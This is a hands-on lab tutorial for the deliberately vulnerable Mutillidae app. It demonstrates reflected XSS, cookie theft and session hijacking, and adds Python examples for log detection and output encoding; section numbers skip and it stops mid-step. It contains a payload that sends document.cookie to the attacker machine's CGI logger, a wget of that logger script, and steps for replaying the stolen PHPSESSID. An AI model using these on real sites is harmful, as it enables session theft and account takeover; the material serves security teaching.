Reflected Cross Site Scripting Injection #1, Man-In-The-Middle Attack
Section 0. Background Information |
- What is Mutillidae?
- OWASP Mutillidae II is a free, open source, deliberately vulnerable web application that provides a target for web-security enthusiasts.
- What is Cross Site Scripting?
- Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications.
- XSS enables attackers to inject client-side script into Web pages viewed by other users.
- A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.
- In addition, the attacker can send input (e.g., username, password, session ID, etc.) which can later be captured by an external script.
- What is a Man-In-The-Middle attack?
- The man-in-the-middle attack takes on many forms. The most common form is active network eavesdropping, in which the attacker is able to gain authentication credentials (username, password, SESSIONID, cookie information, etc.).
- What is Cookie Manager+?
- A cookie manager to view, edit and create new cookies. It also shows extra information about cookies, allows editing multiple cookies at once, and can back them up and restore them.
- Pre-Requisite Lab
- Mutillidae: Lesson 1: How to Install Mutillidae in Fedora
- Note: Remote database access has been turned on to provide an additional vulnerability.
- BackTrack: Lesson 1: Installing BackTrack 5
- Note: This is not absolutely necessary, but if you are a computer security student or professional, you should have a BackTrack VM.
- BackTrack: Lesson 9: How To Install Firebug
- Note: Firebug integrates with Firefox to put a wealth of web development tools at your fingertips while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page.
- BackTrack: Lesson 10: How To Install Cookies Manager+ 1.5.2
- Note: A cookie manager to view, edit and create new cookies.
- Lab Notes
- In this lab we will do the following:
- Due to a deliberately placed bug in the dns-lookup.php code, we will use Reflected Cross Site Scripting techniques to test for vulnerabilities.
- We will capture UserID and Session Cookie Data.
- We will send captured UserID and Session Cookie Data to a remote location.
- We will use captured UserID and Session Cookie Data to re-enter the website.
- Legal Disclaimer - educational tutorial
Section 1. Configure Fedora14 Virtual Machine Settings |
- Open Your VMware Player
- Instructions:
- On Your Host Computer, Go To
- Start --> All Program --> VMWare --> VMWare Player
- Edit Fedora Mutillidae Virtual Machine Settings
- Instructions:
- Highlight fedora14
- Click Edit virtual machine settings
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_thpaDE_ZpFUnpyewuBuLDavJ-o-h9gs_C95x7GNHgRkt2FDQJTwmu3Tv-_YfEjaBFkR-9jlziPNgmvv8L7GYYkNJ-ycz-G4T-zC4lYMdzqMg4HdY4SOhqAw3dLsmQPQxwCsMfI0HBm4BOXtKnGPBSGNmhhl2Mn4bWS4E6a18ZoMMJgf37a967A=s0-d)
- Edit Network Adapter
- Instructions:
- Highlight Network Adapter
- Select Bridged
- Click the OK Button
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uBSwNMKXYi4BUyPwyeWojQkgk6alb4uO7_UTuRH25OYWAYXa9NpeSzBH4hvgP3KBKryHjK-0DHFCzuHVTeiv4PApOrCMUXC7FEdK6rZNzMCRGfYk4H0MxJoG3dyNj2BdMj7YR4umhXwvi6YTS0u1lZ4V0JMPiu7lrcYn0bhdH08BHLYJ53t5hc=s0-d)
Section 2. Login to Fedora14 - Mutillidae |
- Start Fedora14 VM Instance
- Instructions:
- Start Up VMWare Player
- Select Fedora14 - Mutillidae
- Play virtual machine
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_segvzCTaTsWeUHmhhCkDgabLwOn61zMHjShecFhEw6lkGig8wxiETOyHOF2DwwYh0PQqqoZBBbk0KV7LHpsFPe89GabWBUekHvtODX9f2Ht4V_YWOQsMhPru5-B8upxPAbEgCB_C4Ld9I8AQ_NqI-PsZMjxcytYB3hJE4AcZQaKaspbLS9vq_oovg=s0-d)
- Login to Fedora14 - Mutillidae
- Instructions:
- Login: student
- Password: <whatever you set it to>.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vBP5-MmfpjjDVwP4O178ZpukEi2ESYatYXBui5kScIyULoN7JBMaWWyJGnwKfuH9rSFN59m8wdIuUPm-i4tT-KDr7FD3aDIpgpVZmn3gUJ66nshaOE5VEFchsVtCgn-2fVKfQqACpMpgljiLGPli7fCtLQ2vZ7pmgfb9J6P6v9OhUSS5DErVYaXw=s0-d)
Section 3. Open Console Terminal and Retrieve IP Address |
- Start a Terminal Console
- Instructions:
- Applications --> Terminal
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uTjNF7V_OmEptV5Ell1Kjrcz1fUCfYoP5AoPoqAXnmf79MU2ej5qDoInoYV_-NlsQHQ7XRu1ih32ro7byy6VCDW3_c3ZCN9qMCB7msIE60jvdcQM603J1I0Igcq33fBrGHKsxr3haAaU_RjJ8V9L2CAhzN7Um7j4SNvdI8fNdPUv6UXCzr3ZsrqKE=s0-d)
- Switch user to root
- Instructions:
- su - root
- <Whatever you set the root password to>
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tsPT3f_lY5ZNvqdH_BJg55f-_wW7mq4HKp0oxMHBp7nTuh52uoCHszYJeywkso_ir9Yg164J_eJbS-TYrzzzDpbN2U2YTkJm2vhqvFlbsEXHU2ut3kGzSU2Up-hUDJGs_PZtZ5RSeNh3doiw79-dd1BaNI31D2hE0qncs9p5w2KvLEIn6DOTGVs8A=s0-d)
- Get IP Address
- Instructions:
- ifconfig -a
- Notes (FYI):
- As indicated below, my IP address is 192.168.1.111.
- Please record your IP address.
Section 4. Configure BackTrack Virtual Machine Settings |
- Edit the BackTrack5R1 VM
- Instructions:
- Select BackTrack5R1 VM
- Click Edit virtual machine settings
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uhc9k37_ZwStFebh4Pp1F4jRC3RhSAT7iHID21hACc6M51m6n8ZLmnFcxe7JFWsnMim6sLSamHhZAAjkZbVaUrlRWXl0gur2h5mXGxoZPNfkXTucTXWnZ4KbxgAhveNTu0uqEw9moxLNqd98Zrcp0t_SOEyH1TOBzFWGuM3AuQuGZ-Vn1hW7s=s0-d)
- Edit Virtual Machine Settings
- Instructions:
- Click on Network Adapter
- Click on the Bridged Radio button
- Click on the OK Button
Section 5. Play and Login to BackTrack |
- Play the BackTrack5R1 VM
- Instructions:
- Click on the BackTrack5R1 VM
- Click on Play virtual machine
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tTxX_uci5aVYZ-atapGCCUh-3Wbbl4O-hmeuFpljMYhMgxoEgu6liUCE45e_DubWxgT_mO_QJsuetx4gpm5YTJZx6W9RM7Y2a8rYu3BOB55fYuI3lCZLZ4NwTE0xsQ4rpyi43-ufdiqKTXshPwo9bfYJLxq6iEl0TTsB271JoYdQdQCey8PdU=s0-d)
- Login to BackTrack
- Instructions:
- Login: root
- Password: toor or <whatever you changed it to>.
- Bring up GNOME
- Instructions:
- Type startx
Section 6. Open Console Terminal and Retrieve IP Address |
- On BackTrack, Start up a terminal window
- Instructions:
- Click on the Terminal Window
- Obtain the IP Address
- Instructions:
- ifconfig -a
- Note(FYI):
- My IP address is 192.168.1.112.
- In your case, it will probably be different.
- This is the machine that will be used to attack the victim machine (Mutillidae).
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ufocg0Ns1YLF3_wPOvoL2uu1-23lvJlPO_FJBkFTQRan--bleBJw-aLgi7EhInK4s-eCdyuPE573Xf7PTwkFEuYnIE5-Q5fozOz_4-yIYCo-6lcZuZ3qaSFH-FM7UnxTIQjAKiVdYnVTvq90mwXSGhMqtMMXexick1H2aX-aK-MrHjScJNt5mgcQ=s0-d)
Section 7. Navigate to "DNS Lookup" |
- On BackTrack, Open Firefox
- Instructions:
- Click on the Firefox Icon
- Notes (FYI):
- If the Firefox icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tw1XJw4ZXuQhC-DTosfkh-ua4xKgz8xBoVwVL-QahXE_N6dP07nUv7aY590AaSCbd5tBP2s_MeWYLEoolAirJEukCkIpTcx3Mhqjibipd_mM27CWM5dkTolvPN5rwax_Y6Jj4EZUkEaorlATUa4KnjEydMLwySpMgq_ale3pcPiVfTQ4HwwWuq-g=s0-d)
- Open Mutillidae
- Notes (FYI):
- Replace 192.168.1.111 in the following URL (http://192.168.1.111/mutillidae) with your Mutillidae IP Address obtained in Section 3, Step 3.
- Instructions:
- Place the following URL in the Address Bar
- http://192.168.1.111/mutillidae/
- Click Login/Register
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sXbjbcxKM95aoAU_58baI2KTQOOAnZf9da_NMTFfZem8e5LkRMOSz5btdMuqlsKPlq7W4VZ3lUMu0OMkZ4l9tEIHISOMvnW9qTlHSD151HbzbO_z-UtNvYM7Gb70Z-egH5wsdz4eaiqwd-zddhcF9nEclGR382Qv3TGl7LbEARlMxzRoZ3G5V2g_E=s0-d)
- Login
- Instructions:
- Name: samurai
- Password: samurai
- Click the Login Button
- Notes(FYI):
- We are logging on to Mutillidae to simulate a user logging on to a real application and being granted a Session ID.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vXq9hGF1yzVMKyiSVN6TaDskVnu9epLsYjxd9_-pb9kUX_n0z8fM_zBF7Z_xaAm7uzLJS8Ayh-l-hLgKmJhb8UJ6jRw_fvXrZz3GnKriMtp8pbA5-7BXdmwZgUN1LctwUVcC9lPKuhEAUpLlVt8qgGySSkjADXkv3m2g8wmvzuqNrOqirD58QdfX8=s0-d)
Section 8. Reflected Cross Site Scripting (XSS) Injection #1 - Popup Window |
- DNS Lookup
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Reflected (First Order) --> DNS Lookup
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uguoGdUR-RD4Qi6-APH_z0X_EOtY6s8ZurjDNv4N4cnUYDsN3NSSpmfU0Wockq9T19Z2wIu-5_ASD9RLgZbvv1dezb0ZNkCw2-rzkAIp48dzdk-O_51_yt4qoAK24Meq-T6GdFLeAruK2WmCNtoObDYTW1PXCXjpS6HJr_CQVTajrxLX8ffzehm6g=s0-d)
- Inspect Textbox Element
- Instructions:
- Right Click in Hostname/IP Textbox
- Click on Inspect Element
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tCo_tv5P5cXm_WjOO0E0C_ukNxSopirsIHdkCYnUb9VYqrJmrnxETw5_KM9Vj0IPBjtcyCj-ZAjT4fmlE4HFp3jFYMnUaf1D3VIUVB3KkkQxrfObXsgp6mbNzlQDWbxyz2UuAAXWvoqo9Lr_UGTZrYRPjXlhTWTIaXmnU8LXeoBSmlP2q4HQoGe2Y=s0-d)
- Change Text Box Size
- Instructions:
- After the string "size=", Change 20 to 100. (See Picture)
- Click on the Close Button
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u0FBRcDOxEnCQvcKiuUB5ro7wQIDU5wKZZWMP4cZ9nCNpWeqosj5f04LNcuJ7Jk1BIJnJ1hQ4FVHnM-8dcaJWFHLPxJ894sroqoIIiF6SY_ri8zknDs1bjmSuAIyy392U-3ZwCPqqsaoYEmnOWZZm25E8iQcR8v9YvzaJoXxVqlJa78n3Ek9pPOw=s0-d)
- Test Cross Site Script (XSS) Injection
- Instructions:
- In the Hostname/IP Textbox place the following string
- <script>alert("Hello")</script>
- Click the Lookup DNS Button
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uEjoUpWnsWbxa3PX5G6-PGl1oxtJGvdV1PgQWU78EgVzo1jbfabn1fQabLLQk4OtFysULDrtYSp2rktuNJHLHdCWcbr6XmRKgjz6bM2_F_YQMhjDohD_2ZQucMKFITfPpb5-LnISLgt1BygD0ITKPVlSYrJrSZ3iT03HcjS3qpGVUzPKkybgsngA=s0-d)
- View Cross Site Script (XSS) Injection Results
- Note(FYI):
- The fact that we can pop up a JavaScript alert box indicates this webpage is susceptible to Cross Site Script Injections.
- Instructions:
- Click the OK Button
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tsaFAvLRwDJXlxN1RweczNYMQ8EH-3ASbc-XJUYFrBGpfubqLA48O8182pPIV_7kOMtFg9Mwyahrn4i5xTGLzzuXYenWjzy9_YEle2oxKsEidc7Tf47PfAr9M3bSTdA_NIEbOmgU1ht8wbmgK4QpAokXRSo51wt3oVghf0giBpDuV11s2VOpkXiqI=s0-d)
Section 9. Reflected Cross Site Scripting (XSS) Injection #2 - Popup Cookie |
- DNS Lookup
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Reflected (First Order) --> DNS Lookup
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uguoGdUR-RD4Qi6-APH_z0X_EOtY6s8ZurjDNv4N4cnUYDsN3NSSpmfU0Wockq9T19Z2wIu-5_ASD9RLgZbvv1dezb0ZNkCw2-rzkAIp48dzdk-O_51_yt4qoAK24Meq-T6GdFLeAruK2WmCNtoObDYTW1PXCXjpS6HJr_CQVTajrxLX8ffzehm6g=s0-d)
- Inspect Textbox Element
- Instructions:
- Right Click in Hostname/IP Textbox
- Click on Inspect Element
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tCo_tv5P5cXm_WjOO0E0C_ukNxSopirsIHdkCYnUb9VYqrJmrnxETw5_KM9Vj0IPBjtcyCj-ZAjT4fmlE4HFp3jFYMnUaf1D3VIUVB3KkkQxrfObXsgp6mbNzlQDWbxyz2UuAAXWvoqo9Lr_UGTZrYRPjXlhTWTIaXmnU8LXeoBSmlP2q4HQoGe2Y=s0-d)
- Change Text Box Size
- Instructions:
- After the string "size=", Change 20 to 100. (See Picture)
- Click on the Close Button
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u0FBRcDOxEnCQvcKiuUB5ro7wQIDU5wKZZWMP4cZ9nCNpWeqosj5f04LNcuJ7Jk1BIJnJ1hQ4FVHnM-8dcaJWFHLPxJ894sroqoIIiF6SY_ri8zknDs1bjmSuAIyy392U-3ZwCPqqsaoYEmnOWZZm25E8iQcR8v9YvzaJoXxVqlJa78n3Ek9pPOw=s0-d)
- Test Cross Site Script (XSS) Injection
- Instructions:
- In the Hostname/IP Textbox place the following string
- <script>alert(document.cookie)</script>
- Click the Lookup DNS Button
- Note(FYI):
- The goal here is to determine (1) if this webpage contains a cookie AND (2) if we can display the cookie in a JavaScript alert box.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sHO1AuIBtOGrO_hVz3pRU3LhNvhWOrf9UsmPbUqvTYXFGraeoa3AjHptwm00QRM6F2FXb2JadZTanwXtknSUvA7xZ6Il1R2uN2JXG8L4n-32yAe8G2vZcrS1ozccihWLobdC04f8D2VzVorBWXFbUDjaJmaltxZ3DxFCGZMY1W1NrrjCoptaXuJA=s0-d)
- View Cookie
- Instructions:
- Notice the cookie displays the username
- Notice the cookie displays the PHP Session ID.
- Click the OK Button
- Notes(FYI):
- Imagine if this were a bank website and every time a user logged in, their cookie information was sent to a remote location.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tqRLIQvBE_dV7_p6GIeEdbQCfPfE62M_5cPotM7ZHYhHTTgzdpMXnXPuzQabnKAHzhKMaYLbTnoCGKNPNA0b68ZrSmZC1JD8jvh-is4_cpna_L51YCfja1DZhvfE8ikzLtrFs48cNP4kWBrF19x1MKsXpsp8vvUJj9YSCLsdxJ-2W0VKx6RoLN2VQ=s0-d)
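The probes in Sections 8 and 9 leave traces on the target side whenever the payload travels in the query string; the Python below, an added defender-side example that is not part of the original lab, scans Apache combined-format access log lines for them after URL-decoding. The log lines, the `host` parameter name and the client addresses are constructed to mirror the lab, not captured from a real server.

```python
"""Flag reflected-XSS probes in an Apache access log.

Added defender-side example, not part of the original lab.  The log lines
are constructed (not captured) to resemble what the Mutillidae host would
record if the Section 8 and 9 payloads travelled in the query string; the
parameter name `host` and the client addresses are assumptions.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache "combined" format lines; 192.168.1.112 is the lab's BackTrack box.
SAMPLE_LOG = r"""
192.168.1.112 - - [12/Mar/2014:10:01:02 -0500] "GET /mutillidae/index.php?page=dns-lookup.php HTTP/1.1" 200 5121 "-" "Mozilla/5.0"
192.168.1.112 - - [12/Mar/2014:10:02:15 -0500] "GET /mutillidae/index.php?page=dns-lookup.php&host=%3Cscript%3Ealert%28%22Hello%22%29%3C%2Fscript%3E HTTP/1.1" 200 5390 "-" "Mozilla/5.0"
192.168.1.112 - - [12/Mar/2014:10:03:02 -0500] "GET /mutillidae/index.php?page=dns-lookup.php&host=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E HTTP/1.1" 200 5402 "-" "Mozilla/5.0"
192.168.1.50 - - [12/Mar/2014:10:04:30 -0500] "GET /mutillidae/index.php?page=dns-lookup.php&host=www.example.com HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$')

# Markers drawn from the payloads used in this lab, matched case-insensitively
# after decoding so %3Cscript%3E and <SCRIPT> both trigger.
XSS_MARKERS = re.compile(r'<\s*script|document\.cookie|document\.location', re.I)

def decoded_params(target):
    """Query parameters of a request target, decoded twice: parse_qs undoes
    one layer of %XX/+ encoding and unquote a second, so %253Cscript%253E is
    still seen as <script>.  The second pass uses unquote, not unquote_plus,
    so a literal '+' restored by the first pass survives."""
    query = urlsplit(target).query
    return {k: [unquote(v) for v in vs]
            for k, vs in parse_qs(query, keep_blank_values=True).items()}

def find_xss_probes(log_text):
    """Return [(client_ip, timestamp, path, param, decoded_value)] for every
    request whose decoded query parameters contain an XSS marker."""
    hits = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than abort
        path = urlsplit(m['target']).path
        for param, values in decoded_params(m['target']).items():
            for value in values:
                if XSS_MARKERS.search(value):
                    hits.append((m['ip'], m['ts'], path, param, value))
    return hits

if __name__ == '__main__':
    for ip, ts, path, param, value in find_xss_probes(SAMPLE_LOG):
        print(f'{ts} {ip} {path} {param}={value!r}')
```

Payloads submitted in a POST body, as the DNS Lookup form does, are not written to the access log by default, so this check only sees probes delivered in the URL.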
Section 13. Prepare BackTrack CGI Cookie Script |
- On BackTrack, Start up a terminal window
- Instructions:
- Click on the Terminal Window
- Start Apache2
- Instructions:
- service apache2 start
- service apache2 status
- ps -eaf | grep apache2 | grep -v grep
- Note(FYI):
- Start up the apache2 webserver.
- Display the status of the apache2 webserver.
- See the processes of the apache2 webserver.
- Make Apache Log Directory
- Instructions:
- mkdir -p /var/www/logdir
- chown www-data:www-data /var/www/logdir
- chmod 700 /var/www/logdir
- ls -ld /var/www/logdir
- Note(FYI):
- Make a directory called logdir inside of /var/www
- Set the ownership of logdir to www-data
- Set the permissions on logdir so that only the apache2 process (running as www-data) can read, write and traverse this directory.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t_kC6SUZHpWv3RoXyWw-FfyY4Pi9vbOAW1dqTuP5g181FD4Nv4_YguTaGzTDkno0zUyc8zmdD2k9xfeuY-IlSl4XX3h-F3cHrURJ5BpQHm8dn1KD0sZUjnFh7SFgQzED-Jj_hZRZVidhootBY4JizfNjKuQoeq2nZc-cYMvXCDq-Le_amlC6aBMw=s0-d)
- Configure CGI Cookie Script
- Instructions:
- cd /usr/lib/cgi-bin
- wget http://goo.gl/Zb5MZe
- mv logit.pl.TXT logit.pl
- chown www-data:www-data logit.pl
- chmod 700 logit.pl
- perl -c logit.pl
- Note(FYI):
- Change directory to /usr/lib/cgi-bin
- Use wget to download the CGI Cookie Script
- Rename Script
- Set ownership of the script to www-data, the user that owns the apache2 webserver processes.
- Set permissions so that only the www-data user can read, write and execute the script.
- Check the syntax of the CGI Cookie Script (logit.pl)
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sggFeNEyID29SiW1o13BAVIsg4QMcGNwjNdwwpchxYTxF0vVW9cVAf-pprJOK6rennu6XgIVZOkRYLC-el5DgFKzt8gsiI1e4wBlMzVOHH_LLr3g7Bd8zSp00pOZlYJgSv_pYqVKVKHhM57mm86eR1AC9HJmflH3Ao9CWYzkqpIQHM2xswyC1pG3U=s0-d)
Section 14. Reflected Cross Site Scripting (XSS) Injection #2 - Popup Cookie |
- DNS Lookup
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Reflected (First Order) --> DNS Lookup
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uguoGdUR-RD4Qi6-APH_z0X_EOtY6s8ZurjDNv4N4cnUYDsN3NSSpmfU0Wockq9T19Z2wIu-5_ASD9RLgZbvv1dezb0ZNkCw2-rzkAIp48dzdk-O_51_yt4qoAK24Meq-T6GdFLeAruK2WmCNtoObDYTW1PXCXjpS6HJr_CQVTajrxLX8ffzehm6g=s0-d)
- Inspect Textbox Element
- Instructions:
- Right Click in Hostname/IP Textbox
- Click on Inspect Element
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tCo_tv5P5cXm_WjOO0E0C_ukNxSopirsIHdkCYnUb9VYqrJmrnxETw5_KM9Vj0IPBjtcyCj-ZAjT4fmlE4HFp3jFYMnUaf1D3VIUVB3KkkQxrfObXsgp6mbNzlQDWbxyz2UuAAXWvoqo9Lr_UGTZrYRPjXlhTWTIaXmnU8LXeoBSmlP2q4HQoGe2Y=s0-d)
- Change Text Box Size
- Instructions:
- After the string "size=", Change 20 to 100. (See Picture)
- Click on the Close Button
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u0FBRcDOxEnCQvcKiuUB5ro7wQIDU5wKZZWMP4cZ9nCNpWeqosj5f04LNcuJ7Jk1BIJnJ1hQ4FVHnM-8dcaJWFHLPxJ894sroqoIIiF6SY_ri8zknDs1bjmSuAIyy392U-3ZwCPqqsaoYEmnOWZZm25E8iQcR8v9YvzaJoXxVqlJa78n3Ek9pPOw=s0-d)
- Test Cross Site Script (XSS) Injection
- Note(FYI):
- Replace 192.168.1.112 with your BackTrack IP Address obtained in (Section 6, Step 2).
- This JavaScript tells the web browser to send the cookies back to the CGI Cookie Script on the BackTrack Machine.
- Instructions:
- In the Hostname/IP Textbox place the following string
- <SCRIPT>document.location='http://192.168.1.112/cgi-bin/logit.pl?'+document.cookie</SCRIPT>
- Click the Lookup DNS Button
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sx-HQoHEo7SuYFf1cQ62t95PKOKaC1mdH7ATDQL5lv3Clko7yprH30sXUQCv2Gco33Pa_SQX8Dl9Q2KiSbF1neWp3TE1gJ8hWGeKF6p4HF0DGqpMPB8TXJyPQn40iIpvcxjD-o86y3VZl2CK65dUVRbT1IZrJGnhoUTQawuBpm1670O7OfCZKi4po=s0-d)
- View Cookie Script Results
- Instructions:
- Notice the Mutillidae IP Address and Vulnerable Weblink
- Notice the cookie username
- Notice the cookie PHP Session ID.
- Notes(FYI):
- Note that a malicious person would not actually display the results back to the victim once the button is clicked.
- Continue to the next step to see where a malicious person might store this data.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uu5AF5Yk54klKvuAhLmSz6lrZhCVQJk2dzVn-sZeu-DjvH4bQUIvHGHVwUvVDAU_Gq6zjCP6dizHJAr-UU-m2mmuNbhRCI2fu0PVG5eegxp8O0Brq6FeX-KjTBA6CTTogFD-CXCOHE8pROuYOBekdt5f91QBVSX4kxNVtPyaL3-T1SAiIpwTRsKj8=s0-d)
- View Cookie Script Log File
- Note(FYI):
- Replace 192.168.1.112 with your BackTrack IP Address obtained in (Section 6, Step 2).
- Now we have a running log file of the IP addresses, cookie usernames, and Session IDs of potential victims.
- Pretty scary stuff. This is why it is necessary for web developers to (1) use output encoding and (2) test their site for XSS injection attempts.
- Instructions:
- Place the following URL in the Address Textbox
- http://192.168.1.112/logdir/log.txt
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_voRxVnm2-uUpi8rHzoYu0d3u1Nie3he9ufadz07J7iHtM87p_NTE2eXwGFLzwIKXkW-3mCjvpDODqpAuKLkdnDcBDs8JrHUGT7Dgw3Ds0iTqA0DQraue-W8vYV9UOIGMQrgPFnF3kFJSlPh3M49Az-mXehRE_puKufRB2ttvC3iztpvEksqhijec0=s0-d)
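The note above says developers must encode; as an added example that is not Mutillidae's code (Mutillidae is PHP, this is Python, with html.escape standing in for htmlspecialchars), the block below shows the three server-side controls that break this lab's chain: validating the lookup target, encoding anything reflected back, and issuing PHPSESSID with HttpOnly so document.cookie can no longer read it. All function names are this example's own.

```python
"""Three server-side controls that break this lab's chain: validate the lookup
target, HTML-encode anything reflected into the page, and issue the session
cookie with HttpOnly so document.cookie cannot read it.

Added example, not Mutillidae code: Mutillidae is PHP, this shows the same
controls in Python (html.escape corresponds to PHP's htmlspecialchars).
Function names are this example's own.
"""
import html
import ipaddress
import re
from http.cookies import SimpleCookie

# RFC 1123 hostname: 1-63 char labels of letters, digits and hyphens (no leading
# or trailing hyphen), dot separated, at most 253 characters overall.
HOSTNAME_RE = re.compile(
    r'^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)'
    r'(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$')

def is_valid_lookup_target(value):
    """Accept only an IP literal or a hostname; every payload in this lab fails."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(value))

def render_lookup_result_unsafe(target):
    """The pattern the lab exploits: input concatenated straight into HTML,
    so <script>...</script> is returned to the browser as markup."""
    return '<p>Results for ' + target + '</p>'

def render_lookup_result(target):
    """Hardened: invalid targets are rejected, and whatever is reflected
    (including the rejected value in the error message) is HTML-encoded,
    so the control does not rest on the validator alone."""
    if not is_valid_lookup_target(target):
        return '<p>Invalid target: ' + html.escape(target) + '</p>'
    return '<p>Results for ' + html.escape(target) + '</p>'

def session_cookie_header(session_id):
    """Set-Cookie header for PHPSESSID with HttpOnly (the Section 9 and 14
    payloads read document.cookie, which then no longer contains the session
    ID) and SameSite=Lax.  Add the Secure flag when serving over HTTPS."""
    cookie = SimpleCookie()
    cookie['PHPSESSID'] = session_id
    cookie['PHPSESSID']['path'] = '/'
    cookie['PHPSESSID']['httponly'] = True
    cookie['PHPSESSID']['samesite'] = 'Lax'
    return cookie.output(header='Set-Cookie:')

if __name__ == '__main__':
    probe = '<script>alert(document.cookie)</script>'  # Section 9 payload
    print(render_lookup_result_unsafe(probe))
    print(render_lookup_result(probe))
    print(session_cookie_header('SESSION-ID-PLACEHOLDER'))  # constructed value
```

HttpOnly stops the cookie from being read by script, but it does not stop the reflected script itself from running; the encoding and validation are what remove the injection.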
Section 16. Simulate Man-In-The-Middle Attack |
- Start Cookies Manager+
- Notes (FYI):
- See the pre-requisite lab (BackTrack: Lesson 10) to install Cookies Manager+ if you have not already done so.
- Instructions:
- Tools --> Cookies Manager+
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ucnZY6kCv7gHupp-V1krKjG89gImAPuZ1s9_z2yfg4r4HGPeSGVYW-1ORMIZoXuVFAAhcNDJhSfHyjWcGWLgx85MusJxrYSrLMXm8wDTg6e3QwF4PdRLawWnnuuB93bSEsi2ne67WsKPDDM9qWxO9F-BGsyPnDbbnf0OsYrkwFZnJQWtulBsgP5g=s0-d)
- Add Cookie Entry
- Instructions:
- Click the Add Button
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sJaMdHYDgvBLRROBPkQ8Z8a37UYwWkr0R9KrRE_-0PW7e6xfVTMijBJUk3qEuBoFVioBPYCvmC4mdbKp6XJcy63xyxIVlSIr_aCpgZlPX_JdkywnrSSuIIXS3nu3QRb9o1qv9PdWOIxKg85OmC6AzfNHwhc6gYkx_HGN7sKhPMJjswWH7stFK2L8w=s0-d)
- Add PHPSESSID Cookie Entry
- Note(FYI):
- Replace 6lmbhjodbtnj6o5ajuli7p1s24 with your PHPSESSID (see the picture below).
- Replace 192.168.1.111 with the Mutillidae Host IP Address obtained in Section 3, Step 3.
- Instructions:
- Name: PHPSESSID
- Content: 6lmbhjodbtnj6o5ajuli7p1s24
- Host: 192.168.1.111
- Path: /
- Click the Save Button.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t0lw_0IZP8-IRD2gj7V83JApY81IKP1O4PR31OJ_NhTeR-oD825cGEaD05FhagJtDfJkidkdlblOKKO17DTHG_XMGolNv7v0kZlXUWikGqg6KHdLf2Daza5uDF0_qW32f95EFpCabqo5BJ7yT0wJ_qH332KJRtupx7o0AJSLD_E8S7eQdUOuOacw=s0-d)
- Add showhints Cookie Entry
- Note(FYI):
- Replace 192.168.1.111 with the Mutillidae Host IP Address obtained in Section 3, Step 3.
- Instructions:
- Click the Add Button
- Name: showhints
- Content: 0
- Host: 192.168.1.111
- Path: /mutillidae/
- Click the Save Button
- Add username Cookie Entry
- Note(FYI):
- Replace 192.168.1.111 with the Mutillidae Host IP Address obtained in Section 3, Step 3.
- Instructions:
- Click the Add Button
- Name: username
- Content: samurai
- Host: 192.168.1.111
- Path: /mutillidae/
- Select Date
- Increase the Date by 1 or 2 days
- Click the Save Button
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vMV5sHYgOKrfSAWiAJgV2OdaikUA_Lqq5sFzfw9uGvKXwRsOpbuNMF-Cw9_wpiIHaqYZat_YrRqOUsBnEhxEof650WiPhGNepjZIs_xRO4228qtcfHvp-k-ilPkDYHRSOcT4uOEFYC1mdzaFU1WqY_5PSaA-8P3aqI8Ys3U9j-Z4Wht__2WnXUNQ=s0-d)
- Add uid Cookie Entry
- Note(FYI):
- Replace 192.168.1.111 with the Mutillidae Host IP Address obtained in Section 3, Step 3.
- Instructions:
- Click the Add Button
- Name: uid
- Content: 6
